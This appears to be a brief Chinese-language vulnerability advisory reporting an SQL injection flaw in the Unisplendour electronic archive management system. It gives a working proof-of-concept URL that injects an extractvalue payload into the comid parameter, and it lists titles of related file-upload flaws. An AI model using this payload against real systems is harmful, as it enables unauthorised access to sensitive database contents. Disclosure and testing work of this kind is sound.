紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
登录页面
验证POC
/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
畅捷CRM 后台附件任意文件上传漏洞 紫光档案管理系统 upload.html 后台文件上传漏洞
